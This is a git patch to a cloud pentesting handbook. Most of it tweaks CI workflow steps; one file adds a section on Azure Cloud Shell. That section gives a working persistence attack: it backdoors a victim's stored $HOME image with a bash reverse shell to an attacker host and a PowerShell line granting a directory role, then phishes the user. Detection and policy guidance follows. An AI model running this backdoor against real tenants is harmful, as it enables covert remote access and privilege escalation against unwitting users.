From c6b3795cc59fcd4b2ad9b102d05ee36806a152a7 Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Fri, 21 Feb 2025 14:55:41 +0100 Subject: [PATCH] fix workflows --- .github/workflows/build_master.yml | 4 +- .github/workflows/translate_de.yml | 4 +- .github/workflows/translate_el.yml | 4 +- .github/workflows/translate_es.yml | 4 +- .github/workflows/translate_fr.yml | 4 +- .github/workflows/translate_hi.yml | 4 +- .github/workflows/translate_it.yml | 4 +- .github/workflows/translate_ja.yml | 4 +- .github/workflows/translate_ko.yml | 4 +- .github/workflows/translate_pl.yml | 4 +- .github/workflows/translate_pt.yml | 4 +- .github/workflows/translate_sr.yml | 4 +- .github/workflows/translate_sw.yml | 4 +- .github/workflows/translate_tr.yml | 4 +- .github/workflows/translate_uk.yml | 4 +- .github/workflows/translate_zh.yml | 4 +- .../az-services/az-cloud-shell.md | 106 +++++++++++++++++- 17 files changed, 133 insertions(+), 37 deletions(-) diff --git a/.github/workflows/build_master.yml b/.github/workflows/build_master.yml index 6c3ba1592..19af7a94b 100644 --- a/.github/workflows/build_master.yml +++ b/.github/workflows/build_master.yml @@ -37,7 +37,7 @@ jobs: - name: Update searchindex.js in repo run: | - git config --global --add safe.directory /__w/hacktricks-cloud/hacktricks-cloud + (git config --global --add safe.directory /__w/hacktricks-cloud/hacktricks-cloud git pull git config --global user.email "build@example.com" git config --global user.name "Build master" @@ -46,7 +46,7 @@ jobs: cp book/searchindex.json searchindex.json git add searchindex.js searchindex.json git commit -m "Update searchindex" - git push + git push) || echo "No changes to searchindex.js" # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_de.yml b/.github/workflows/translate_de.yml index f12fd4507..58ec2cef1 100644 --- a/.github/workflows/translate_de.yml +++ b/.github/workflows/translate_de.yml @@ -68,13 +68,13 @@ jobs: - name: Update searchindex.js in repo run: | - git checkout $BRANCH + (git checkout $BRANCH git pull cp book/searchindex.js searchindex.js cp book/searchindex.json searchindex.json git add searchindex.js searchindex.json git commit -m "Update searchindex for $BRANCH" - git push + git push) || echo "No changes to searchindex.js" # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_el.yml b/.github/workflows/translate_el.yml index a274f6712..65e7ebaef 100644 --- a/.github/workflows/translate_el.yml +++ b/.github/workflows/translate_el.yml @@ -68,13 +68,13 @@ jobs: - name: Update searchindex.js in repo run: | - git checkout $BRANCH + (git checkout $BRANCH git pull cp book/searchindex.js searchindex.js cp book/searchindex.json searchindex.json git add searchindex.js searchindex.json git commit -m "Update searchindex for $BRANCH" - git push + git push) || echo "No changes to searchindex.js" # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_es.yml b/.github/workflows/translate_es.yml index 03e504912..c3690c9ca 100644 --- a/.github/workflows/translate_es.yml +++ b/.github/workflows/translate_es.yml @@ -67,13 +67,13 @@ jobs: - name: Update searchindex.js in repo run: | - git checkout $BRANCH + (git checkout $BRANCH git pull cp book/searchindex.js searchindex.js cp book/searchindex.json searchindex.json git add searchindex.js searchindex.json git commit -m "Update searchindex for $BRANCH" - git push + git push) || echo "No changes to searchindex.js" # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_fr.yml b/.github/workflows/translate_fr.yml index 79668a6a9..5c7aaee91 100644 --- a/.github/workflows/translate_fr.yml +++ b/.github/workflows/translate_fr.yml @@ -68,13 +68,13 @@ jobs: - name: Update searchindex.js in repo run: | - git checkout $BRANCH + (git checkout $BRANCH git pull cp book/searchindex.js searchindex.js cp book/searchindex.json searchindex.json git add searchindex.js searchindex.json git commit -m "Update searchindex for $BRANCH" - git push + git push) || echo "No changes to searchindex.js" # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_hi.yml b/.github/workflows/translate_hi.yml index 902bc2649..67b7a3253 100644 --- a/.github/workflows/translate_hi.yml +++ b/.github/workflows/translate_hi.yml @@ -68,13 +68,13 @@ jobs: - name: Update searchindex.js in repo run: | - git checkout $BRANCH + (git checkout $BRANCH git pull cp book/searchindex.js searchindex.js cp book/searchindex.json searchindex.json git add searchindex.js searchindex.json git commit -m "Update searchindex for $BRANCH" - git push + git push) || echo "No changes to searchindex.js" # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_it.yml b/.github/workflows/translate_it.yml index 8f349cf2b..e152b97b5 100644 --- a/.github/workflows/translate_it.yml +++ b/.github/workflows/translate_it.yml @@ -68,13 +68,13 @@ jobs: - name: Update searchindex.js in repo run: | - git checkout $BRANCH + (git checkout $BRANCH git pull cp book/searchindex.js searchindex.js cp book/searchindex.json searchindex.json git add searchindex.js searchindex.json git commit -m "Update searchindex for $BRANCH" - git push + git push) || echo "No changes to searchindex.js" # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_ja.yml b/.github/workflows/translate_ja.yml index afa0b53e1..ad12b954d 100644 --- a/.github/workflows/translate_ja.yml +++ b/.github/workflows/translate_ja.yml @@ -68,13 +68,13 @@ jobs: - name: Update searchindex.js in repo run: | - git checkout $BRANCH + (git checkout $BRANCH git pull cp book/searchindex.js searchindex.js cp book/searchindex.json searchindex.json git add searchindex.js searchindex.json git commit -m "Update searchindex for $BRANCH" - git push + git push) || echo "No changes to searchindex.js" # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_ko.yml b/.github/workflows/translate_ko.yml index b0105b388..5b894b9b0 100644 --- a/.github/workflows/translate_ko.yml +++ b/.github/workflows/translate_ko.yml @@ -68,13 +68,13 @@ jobs: - name: Update searchindex.js in repo run: | - git checkout $BRANCH + (git checkout $BRANCH git pull cp book/searchindex.js searchindex.js cp book/searchindex.json searchindex.json git add searchindex.js searchindex.json git commit -m "Update searchindex for $BRANCH" - git push + git push) || echo "No changes to searchindex.js" # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_pl.yml b/.github/workflows/translate_pl.yml index f6a07eb23..5a4e32d64 100644 --- a/.github/workflows/translate_pl.yml +++ b/.github/workflows/translate_pl.yml @@ -68,13 +68,13 @@ jobs: - name: Update searchindex.js in repo run: | - git checkout $BRANCH + (git checkout $BRANCH git pull cp book/searchindex.js searchindex.js cp book/searchindex.json searchindex.json git add searchindex.js searchindex.json git commit -m "Update searchindex for $BRANCH" - git push + git push) || echo "No changes to searchindex.js" # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_pt.yml b/.github/workflows/translate_pt.yml index 252c651f3..ef8bb2628 100644 --- a/.github/workflows/translate_pt.yml +++ b/.github/workflows/translate_pt.yml @@ -68,13 +68,13 @@ jobs: - name: Update searchindex.js in repo run: | - git checkout $BRANCH + (git checkout $BRANCH git pull cp book/searchindex.js searchindex.js cp book/searchindex.json searchindex.json git add searchindex.js searchindex.json git commit -m "Update searchindex for $BRANCH" - git push + git push) || echo "No changes to searchindex.js" # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_sr.yml b/.github/workflows/translate_sr.yml index a660db8fe..7d097e5d9 100644 --- a/.github/workflows/translate_sr.yml +++ b/.github/workflows/translate_sr.yml @@ -68,13 +68,13 @@ jobs: - name: Update searchindex.js in repo run: | - git checkout $BRANCH + (git checkout $BRANCH git pull cp book/searchindex.js searchindex.js cp book/searchindex.json searchindex.json git add searchindex.js searchindex.json git commit -m "Update searchindex for $BRANCH" - git push + git push) || echo "No changes to searchindex.js" # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_sw.yml b/.github/workflows/translate_sw.yml index e2761babc..b2338be82 100644 --- a/.github/workflows/translate_sw.yml +++ b/.github/workflows/translate_sw.yml @@ -68,13 +68,13 @@ jobs: - name: Update searchindex.js in repo run: | - git checkout $BRANCH + (git checkout $BRANCH git pull cp book/searchindex.js searchindex.js cp book/searchindex.json searchindex.json git add searchindex.js searchindex.json git commit -m "Update searchindex for $BRANCH" - git push + git push) || echo "No changes to searchindex.js" # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_tr.yml b/.github/workflows/translate_tr.yml index 5c3d9f1bc..05f54b3b3 100644 --- a/.github/workflows/translate_tr.yml +++ b/.github/workflows/translate_tr.yml @@ -68,13 +68,13 @@ jobs: - name: Update searchindex.js in repo run: | - git checkout $BRANCH + (git checkout $BRANCH git pull cp book/searchindex.js searchindex.js cp book/searchindex.json searchindex.json git add searchindex.js searchindex.json git commit -m "Update searchindex for $BRANCH" - git push + git push) || echo "No changes to searchindex.js" # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_uk.yml b/.github/workflows/translate_uk.yml index 8e373361f..7b1d0a4cc 100644 --- a/.github/workflows/translate_uk.yml +++ b/.github/workflows/translate_uk.yml @@ -68,13 +68,13 @@ jobs: - name: Update searchindex.js in repo run: | - git checkout $BRANCH + (git checkout $BRANCH git pull cp book/searchindex.js searchindex.js cp book/searchindex.json searchindex.json git add searchindex.js searchindex.json git commit -m "Update searchindex for $BRANCH" - git push + git push) || echo "No changes to searchindex.js" # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/.github/workflows/translate_zh.yml b/.github/workflows/translate_zh.yml index cbbfdef4e..0dc3240e0 100644 --- a/.github/workflows/translate_zh.yml +++ b/.github/workflows/translate_zh.yml @@ -68,13 +68,13 @@ jobs: - name: Update searchindex.js in repo run: | - git checkout $BRANCH + (git checkout $BRANCH git pull cp book/searchindex.js searchindex.js cp book/searchindex.json searchindex.json git add searchindex.js searchindex.json git commit -m "Update searchindex for $BRANCH" - git push + git push) || echo "No changes to searchindex.js" # Login in AWs - name: Configure AWS credentials using OIDC diff --git a/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md b/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md index a23224e94..9977fa6d0 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md +++ b/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md @@ -10,11 +10,107 @@ There aren't permissions assigned to this service, therefore the aren't privileg ### Key Features -**Environment**:Azure Cloud Shell provides a secure environment by running on Azure Linux, Microsoft’s own Linux distribution designed for cloud infrastructure. All packages included in the Azure Linux repository are internally compiled by Microsoft to guard against supply chain attacks. -**Preinstalled Tools**: Cloud Shell includes a comprehensive set of preinstalled tools such as Azure CLI, Azure PowerShell, Terraform, Docker CLI, Ansible, Git, and text editors like vim, nano, and emacs. These tools are ready to use. To list the installed packeges and modules you can use "Get-Module -ListAvailable", "tdnf list" and "pip3 list". -**$HOME persistence**: When starting Azure Cloud Shell for the first time, you can use it with or without an attached storage account. Choosing not to attach storage creates an ephemeral session where files are deleted when the session ends. To persist files across sessions, mount a storage account, which attaches automatically as **$HOME\clouddrive**, with your **$HOME** directory saved as an **.img** file in Azure File Share. However, files outside $HOME and machine states are not persisted. For securely storing secrets like SSH keys, use Azure Key Vault. -**Azure drive (Azure:)**: PowerShell in Azure Cloud Shell includes the Azure drive (Azure:), which allows easy navigation of Azure resources like Compute, Network, and Storage using filesystem-like commands. Switch to the Azure drive with cd Azure: and return to your home directory with cd ~. You can still use Azure PowerShell cmdlets to manage resources from any drive. -**Custom Tool Installation**: Users who configure Cloud Shell with a storage account can install additional tools that do not require root permissions. This feature allows for further customization of the Cloud Shell environment, enabling users to tailor their setup to their specific needs. +- **Preinstalled Tools**: Cloud Shell includes a comprehensive set of preinstalled tools such as Azure CLI, Azure PowerShell, Terraform, Docker CLI, Ansible, Git, and text editors like vim, nano, and emacs. These tools are ready to use. To list the installed packeges and modules you can use "Get-Module -ListAvailable", "tdnf list" and "pip3 list". +- **Azure drive (Azure:)**: PowerShell in Azure Cloud Shell includes the Azure drive (Azure:), which allows easy navigation of Azure resources like Compute, Network, and Storage using filesystem-like commands. Switch to the Azure drive with cd Azure: and return to your home directory with cd ~. You can still use Azure PowerShell cmdlets to manage resources from any drive. +- **Custom Tool Installation**: Users who configure Cloud Shell with a storage account can install additional tools that do not require root permissions. This feature allows for further customization of the Cloud Shell environment, enabling users to tailor their setup to their specific needs. +- **$HOME persistence**: When starting Azure Cloud Shell for the first time, you can use it with or without an attached storage account. + - Choosing not to attach storage creates an ephemeral session where files are deleted when the session ends. + - To persist files across sessions, you are given the option to **mount a storage account**, which attaches automatically as `$HOME\clouddrive`, with your `$HOME` directory **saved as an .img file in a File Share.** + +### Cloud Shell Phishing + +If anattacker finds other users images in a Storage Accout he has write and read access to, he will be able to download the image, **add a bash and PS backdoor into it**, and upload it back to the Storage Account so next time the user access the shell, the **commands will be automatically executed**. + +- **Download, backdoor and uplaod the image:** + +```bash +# Download image +mkdir /tmp/phishing_img +az storage file download-batch -d /tmp/phishing_img --account-name + +# Mount image +cd /tmp/phishing_img/.cloudconsole +mkdir /tmp/cloudpoison +sudo mount acc_username.img /tmp/cloudpoison +cd /tmp/cloudpoison +sudo mkdir .config +sudo mkdir .config/PowerShell +sudo touch .config/PowerShell/Microsoft.PowerShell_profile.ps1 +sudo chmod 777 .config/PowerShell/Microsoft.PowerShell_profile.ps1 + +# Bash backdoor +echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/${SERVER}/${PORT} 0>&1 &)' >> .bashrc + +# PS backdoor +echo "Connect-AzureAD; Add-AzureADDirectoryRoleMember -ObjectId 1246bcfd-42dc-4bb7-a86d-3637ca422b21 -RefObjectId 1D8B2447-8318-41E5-B365-CB7275862F8A" >> .config/PowerShell/Microsoft.PowerShell_profile.ps1 +cd /tmp + +sudo umount /tmp/cloudpoison + +# Upload image +az storage file upload --account-name --path ".cloudconsole/acc_username.img" --source "./tmp/phishing_img/.cloudconsole/acc_username.img" +``` + +- **Then, phish the user to access https://shell.azure.com/** + + +### Find & Forbid Cloud Shell Automatic Storage Accounts + +Storage accounts created by Cloud Shell are tagged with **`ms-resource-usage:azure-cloud-shell`**. It’s possible to create an Azure resource policy that disable creating resources with this tag. + +Find all the storage accounts created by Cloud Shell by tags: + +```bash +az storage account list --output json | jq '.[] | select(.tags["ms-resource-usage"]=="azure-cloud-shell")' +``` + +Policy to forbid the creation of automatic storage accounts for cloud shell storage based on tags: + +```json +{ + displayName: "Restrict cloud shell storage account creation", + description: "Storage accounts that you create in Cloud Shell are tagged with ms-resource-usage:azure-cloud-shell. If you want to disallow users from creating storage accounts in Cloud Shell, create an Azure resource policy for tags that is triggered by this specific tag. https://learn.microsoft.com/en-us/azure/cloud-shell/persisting-shell-storage#restrict-resource-creation-with-an-azure-resource-policy", + metadata: { + category: "Storage", + version: "1.0.0" + }, + mode: "All", + parameters: { + effect: { + type: "String", + metadata: { + displayName: "Effect", + description: "Deny, Audit or Disabled the execution of the Policy" + }, + allowedValues: [ + "Deny", + "Audit", + "Disabled" + ], + defaultValue: "Audit" + } + }, + policyRule: { + if: { + allOf: [ + { + field: "type", + equals: "Microsoft.Storage/storageAccounts" + }, + { + field: "tags['ms-resource-usage']", + equals: "azure-cloud-shell" + } + ] + }, + then: { + effect: "[parameters('effect')]" + } + } +} +``` + + ## References